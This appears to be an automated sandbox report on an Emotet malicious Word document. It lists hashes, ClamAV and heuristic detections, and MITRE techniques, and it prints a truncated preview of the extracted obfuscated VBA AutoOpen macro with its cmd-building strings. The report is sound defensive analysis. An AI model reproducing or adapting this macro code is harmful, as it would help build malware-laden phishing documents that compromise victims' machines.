Emotet Office (OLE) malware analysis — malicious · 13291236f09834d7

MALICIOUS

Office (OLE)

201.0 KB Created: 2018-09-24 12:28:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: fb4dfa07922cc65ac191b1a9f44e5242 SHA-1: 87e3833daa97755ca99d2651fc8fbeec9df74a5e SHA-256: 13291236f09834d799c6b67b869a25e3f2c4fbd155cd53ba292ecd2ae66bbd87

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The presence of an AutoOpen macro and the ClamAV detection of 'Doc.Downloader.Emotet-6884039-0' strongly suggest this is an Emotet downloader variant. The VBA script is designed to execute a second-stage payload, likely downloaded from a remote source, which is a common Emotet behavior.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6884039-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6884039-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 169632 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	169632 bytes
SHA-256: `90d9cd28afbfd9567c6f2430369ecceefa7c430ec35638f2d08fe72918b9f8ff`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DmPfjHcBIGpj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim QKjwz(1) QKjwz(0) = MidB(HONBzkpXIMEqt + AdrWBLrzqwiwnZztIsjiRvkUXE + dnEJGGcldPQRLw, 51, 827) + MidB(NLGYMTRuabQr + IrUuudTsQwrtbXTstkosFbksLjBVlv + TiHwGQUv, 165, 636) + Left(zWGiWHfCjzPTJ + LPcFzEJEkwdYWhjYtoaSwiQVcUOon + JffbVnpS, 342) + Left(dGfzPrLRsSl + bhijjawJIQMEwmEDUYAJpdFX + cqYiBAoFIi, 834) Dim wiCwnA(2) wiCwnA(0) = Mid(OQzbjFRll + UQiotdZLFNGYSlbWQJscaPAtGLwZQnmN + uIUNpmCHX, 468, 175) + MidB(vUckwcnHYtj + GoqFlERNbIoftFSsbkIjCDqljFVOkupfOR + EjRTLnFCXMpj, 347, 980) wiCwnA(1) = Mid(DiBCuTkHG + kEZMBZpbPitAzoQpwljWbfPQ + vKNRjUzzAoGc, 363, 690) + MidB(pBEGFRqRwR + zhlJzufFVbQcQTciTTzSOLljiTwTRTPzS + fYEwzNkbPozOii, 975, 40) + Mid(sWwMOAlZIwJbR + louuUHbijVjFNoTRzIwSKDMaFlSnX + wqDHvjQsOqVTj, 216, 388) + Right(bIZtmVkqHjWsQ + jRQwPKEYKnbokfPlFOXuKUTQn + zzIAjPuVQhWjPG, 53) Dim qTzLu(1) qTzLu(0) = MidB(owdcGaXs + CTnjZoTCwzznQSHjTWjDJouvFvZRMF + idoQiiIzbNtIM, 195, 969) + MidB(WXkZPis + NHWjnqjckisCrBfbwulivNphTOSwwllR + vZDZjaTBBiV, 985, 899) + Mid(zuKRKqTzIPNR + RGkkDjWrMwVcdLMUTiQazqkccuKWIoGk + PqIMFhLwhMHl, 924, 902) + Right(PwajltTDtzCc + XaobFcWEuJODJUrwPcVKqzVXESI + jsojzVpRQLCR, 348) Dim GbRlnq(1) GbRlnq(0) = MidB(MWGdwtRW + mTnAQUPpspiHnaWJLlHmuXsnsU + NzTQaJG, 219, 937) + Left(wjbEjzDZkGkHai + cXhWUEkQIUqzNzomPJTJoouEwcr + uQdnPzctwLvO, 157) fqLAAvtkGJQ (KeyString(vbKeyC) + KeyString(vbKeyM) + wDUREnGI + qdEBYEMwmNB + sjQjkhFofT + QmOwq + OWidEBvinY + GwVLVbaJNsi + lnQbEFz) Dim mQHUFK(2) mQHUFK(0) = Right(ZjFjSnqE + VQvEDrKHwPoLjRQztGYFwTwvUY + LuqkthiM, 301) + Mid(MYUOCjPCowwNrT + kGvqirHcQpoXiQqOzojcEEWSKNhwQh + GTUOVRswMrrUXQ, 147, 974) + Mid(fVfLjlMZzOj + qwSZWuiTPkhXMCuiElCNSu + CwTdOVTBVFqk, 81, 220) + Mid(lYdIZKiDI + mnlzfjMjXvGsEKjpCtambtQiIrRQ + jjOjFLBri, 764, 399) mQHUFK(1) = MidB(RDPdoAmXsMA + OFEoFikdYvzjrUmRwNzasNc + qqTNZzzvnqip, 886, 28) + Mid(TjFJSkiaiNs + LacPComEiXkYzYEcCMLhXGQFMtiMH + cPFasMBal, 173, 405) Dim YmmPJ(2) YmmPJ(0) = MidB(vjkiXsjWjQ + TZXRCtLXimDwPuYiZFlSLzrcsHt + mHGmBVjWwksId, 723, 380) + Left(IoHLBWiHLTLRSP + PMHzHWMpjTisJMXKuzFnkYfqCYFfUIRN + TqlcRchn, 800) YmmPJ(1) = MidB(GnGXQfDnbXa + JRdnOksVnLrNcWADiNvkwHEcNawo + FSAwuZFEH, 379, 537) + MidB(CChnXbruSN + fJIfupXwoIKBJXddGjnCZfnaN + nFTTOPzYMi, 86, 318) + Left(sLlODOQLlYwsHi + OKwUUFCiHjEtzESIUCLJmDbTuWVI + FPuRKZnICT, 933) + MidB(RnTdkzBf + AMRtlHLzRfohKjtLzsMErKfbtlJ + BMtFtfBAruzQj, 569, 117) End Sub Attribute VB_Name = "lFVGKjDjltFIlj" Function wDUREnGI() Dim SjGBDI(1) SjGBDI(0) = Mid(kfkBWIznaNd + pWsawcwIbXbJEtPmicfZSwswDGKnZ + dNObEjIXII, 183, 107) + MidB(GYofAAj + aiGfsBQkCjnbjBdwXWPrirziWHY + LRnzwAQVsXHZZ, 566, 503) Dim SonTsT(1) SonTsT(0) = MidB(BDzvmNj + SEHnbBnPqfPqSZNNwHlzzMSC + llYfSSKivrnzC, 564, 555) + MidB(LkwRMAVOsjHHa + JadFHkXzsvdWazHUlXHYYlCRZlCaVin + zXGFnlEWjdu, 287, 760) + MidB(WDBicCFTESwOp + nnJdIwiSfcBpHIMPEShFMZtDCm + OBaqHFKRqr, 708, 645) + MidB(AQMwPMBaQpFizE + cfdIOzOQAzcvYhACMYdWdVnllk + FCwOFDtl, 20, 45) Dim PzfjC(2) PzfjC(0) = Mid(wjMRTjjVV + UWWLTiTuJpRqSrNiETvKKlWDZQqPaNo + UjPwwspa, 619, 863) + MidB(cTBRCCvYLMawau + ardcbitvpWvGkiszzozXKt + IJSWEOV, 9, 777) PzfjC(1) = MidB(WzZGcfqAS + iVVwjfcUTiJdmWAHjljHizXiVrTtzZ + zAHhpXUvkMU, 783, 393) + Mid(jTjrrFNmzJz + ApJDKLYzAwwVjXWiPMkZTiiUk + YsQrvvCR, 575, 172) + Mid(iVkfWYqPSaj + PPqVcqolqDudlbTEihBEjC + uwrzIZcjfMwBSs, 883, 853) + Mid(ksnOwEWfIhO + SPutmzcvBEvHRCnJJDSUIjCmbdQ + UFdlXzHtT, 706, 293) FUkzNnwj = "d /V^:/C" + CStr(Chr(1 + 1 + 0 + 3 + 29)) + "s^e^" + "t ^_^{=\^_/ -" + "^_\ \^" + "_- ^\/- \_^" + "-^ ^-^" + "\/ ^\/^-^ ^\" + "_/^ ^" + "-^_" + "\ -_/ _" Dim zhiEBu(2) zhiEBu(0) = MidB(TQRnfAfUSIkv + GzqjludMowHjlQNTOzLCAOThwvcMz + bjNSIuGG, 541, 384) + Right(PbDEpVwsQuupVR + RLlIuicjAAFGTjiUFvrnrDw + mXzqhcoQiXB, 697) + Right(DoPrlwLLUC + jaYtFzowcDPXifTATHbnzbLLt + C ... (truncated)

SHA-256: 90d9cd28afbfd9567c6f2430369ecceefa7c430ec35638f2d08fe72918b9f8ff

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DmPfjHcBIGpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim QKjwz(1)
QKjwz(0) = MidB(HONBzkpXIMEqt + AdrWBLrzqwiwnZztIsjiRvkUXE + dnEJGGcldPQRLw, 51, 827) + MidB(NLGYMTRuabQr + IrUuudTsQwrtbXTstkosFbksLjBVlv + TiHwGQUv, 165, 636) + Left(zWGiWHfCjzPTJ + LPcFzEJEkwdYWhjYtoaSwiQVcUOon + JffbVnpS, 342) + Left(dGfzPrLRsSl + bhijjawJIQMEwmEDUYAJpdFX + cqYiBAoFIi, 834)
   Dim wiCwnA(2)
wiCwnA(0) = Mid(OQzbjFRll + UQiotdZLFNGYSlbWQJscaPAtGLwZQnmN + uIUNpmCHX, 468, 175) + MidB(vUckwcnHYtj + GoqFlERNbIoftFSsbkIjCDqljFVOkupfOR + EjRTLnFCXMpj, 347, 980)
wiCwnA(1) = Mid(DiBCuTkHG + kEZMBZpbPitAzoQpwljWbfPQ + vKNRjUzzAoGc, 363, 690) + MidB(pBEGFRqRwR + zhlJzufFVbQcQTciTTzSOLljiTwTRTPzS + fYEwzNkbPozOii, 975, 40) + Mid(sWwMOAlZIwJbR + louuUHbijVjFNoTRzIwSKDMaFlSnX + wqDHvjQsOqVTj, 216, 388) + Right(bIZtmVkqHjWsQ + jRQwPKEYKnbokfPlFOXuKUTQn + zzIAjPuVQhWjPG, 53)
   Dim qTzLu(1)
qTzLu(0) = MidB(owdcGaXs + CTnjZoTCwzznQSHjTWjDJouvFvZRMF + idoQiiIzbNtIM, 195, 969) + MidB(WXkZPis + NHWjnqjckisCrBfbwulivNphTOSwwllR + vZDZjaTBBiV, 985, 899) + Mid(zuKRKqTzIPNR + RGkkDjWrMwVcdLMUTiQazqkccuKWIoGk + PqIMFhLwhMHl, 924, 902) + Right(PwajltTDtzCc + XaobFcWEuJODJUrwPcVKqzVXESI + jsojzVpRQLCR, 348)
   Dim GbRlnq(1)
GbRlnq(0) = MidB(MWGdwtRW + mTnAQUPpspiHnaWJLlHmuXsnsU + NzTQaJG, 219, 937) + Left(wjbEjzDZkGkHai + cXhWUEkQIUqzNzomPJTJoouEwcr + uQdnPzctwLvO, 157)
fqLAAvtkGJQ (KeyString(vbKeyC) + KeyString(vbKeyM) + wDUREnGI + qdEBYEMwmNB + sjQjkhFofT + QmOwq + OWidEBvinY + GwVLVbaJNsi + lnQbEFz)
   Dim mQHUFK(2)
mQHUFK(0) = Right(ZjFjSnqE + VQvEDrKHwPoLjRQztGYFwTwvUY + LuqkthiM, 301) + Mid(MYUOCjPCowwNrT + kGvqirHcQpoXiQqOzojcEEWSKNhwQh + GTUOVRswMrrUXQ, 147, 974) + Mid(fVfLjlMZzOj + qwSZWuiTPkhXMCuiElCNSu + CwTdOVTBVFqk, 81, 220) + Mid(lYdIZKiDI + mnlzfjMjXvGsEKjpCtambtQiIrRQ + jjOjFLBri, 764, 399)
mQHUFK(1) = MidB(RDPdoAmXsMA + OFEoFikdYvzjrUmRwNzasNc + qqTNZzzvnqip, 886, 28) + Mid(TjFJSkiaiNs + LacPComEiXkYzYEcCMLhXGQFMtiMH + cPFasMBal, 173, 405)
   Dim YmmPJ(2)
YmmPJ(0) = MidB(vjkiXsjWjQ + TZXRCtLXimDwPuYiZFlSLzrcsHt + mHGmBVjWwksId, 723, 380) + Left(IoHLBWiHLTLRSP + PMHzHWMpjTisJMXKuzFnkYfqCYFfUIRN + TqlcRchn, 800)
YmmPJ(1) = MidB(GnGXQfDnbXa + JRdnOksVnLrNcWADiNvkwHEcNawo + FSAwuZFEH, 379, 537) + MidB(CChnXbruSN + fJIfupXwoIKBJXddGjnCZfnaN + nFTTOPzYMi, 86, 318) + Left(sLlODOQLlYwsHi + OKwUUFCiHjEtzESIUCLJmDbTuWVI + FPuRKZnICT, 933) + MidB(RnTdkzBf + AMRtlHLzRfohKjtLzsMErKfbtlJ + BMtFtfBAruzQj, 569, 117)
End Sub


Attribute VB_Name = "lFVGKjDjltFIlj"
Function wDUREnGI()
Dim SjGBDI(1)
SjGBDI(0) = Mid(kfkBWIznaNd + pWsawcwIbXbJEtPmicfZSwswDGKnZ + dNObEjIXII, 183, 107) + MidB(GYofAAj + aiGfsBQkCjnbjBdwXWPrirziWHY + LRnzwAQVsXHZZ, 566, 503)
   Dim SonTsT(1)
SonTsT(0) = MidB(BDzvmNj + SEHnbBnPqfPqSZNNwHlzzMSC + llYfSSKivrnzC, 564, 555) + MidB(LkwRMAVOsjHHa + JadFHkXzsvdWazHUlXHYYlCRZlCaVin + zXGFnlEWjdu, 287, 760) + MidB(WDBicCFTESwOp + nnJdIwiSfcBpHIMPEShFMZtDCm + OBaqHFKRqr, 708, 645) + MidB(AQMwPMBaQpFizE + cfdIOzOQAzcvYhACMYdWdVnllk + FCwOFDtl, 20, 45)
   Dim PzfjC(2)
PzfjC(0) = Mid(wjMRTjjVV + UWWLTiTuJpRqSrNiETvKKlWDZQqPaNo + UjPwwspa, 619, 863) + MidB(cTBRCCvYLMawau + ardcbitvpWvGkiszzozXKt + IJSWEOV, 9, 777)
PzfjC(1) = MidB(WzZGcfqAS + iVVwjfcUTiJdmWAHjljHizXiVrTtzZ + zAHhpXUvkMU, 783, 393) + Mid(jTjrrFNmzJz + ApJDKLYzAwwVjXWiPMkZTiiUk + YsQrvvCR, 575, 172) + Mid(iVkfWYqPSaj + PPqVcqolqDudlbTEihBEjC + uwrzIZcjfMwBSs, 883, 853) + Mid(ksnOwEWfIhO + SPutmzcvBEvHRCnJJDSUIjCmbdQ + UFdlXzHtT, 706, 293)
FUkzNnwj = "d /V^:/C" + CStr(Chr(1 + 1 + 0 + 3 + 29)) + "s^e^" + "t ^_^{=\^_/ -" + "^_\ \^" + "_- ^\/- \_^" + "-^ ^-^" + "\/ ^\/^-^ ^\" + "_/^ ^" + "-^_" + "\ -_/ _"
Dim zhiEBu(2)
zhiEBu(0) = MidB(TQRnfAfUSIkv + GzqjludMowHjlQNTOzLCAOThwvcMz + bjNSIuGG, 541, 384) + Right(PbDEpVwsQuupVR + RLlIuicjAAFGTjiUFvrnrDw + mXzqhcoQiXB, 697) + Right(DoPrlwLLUC + jaYtFzowcDPXifTATHbnzbLLt + C
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.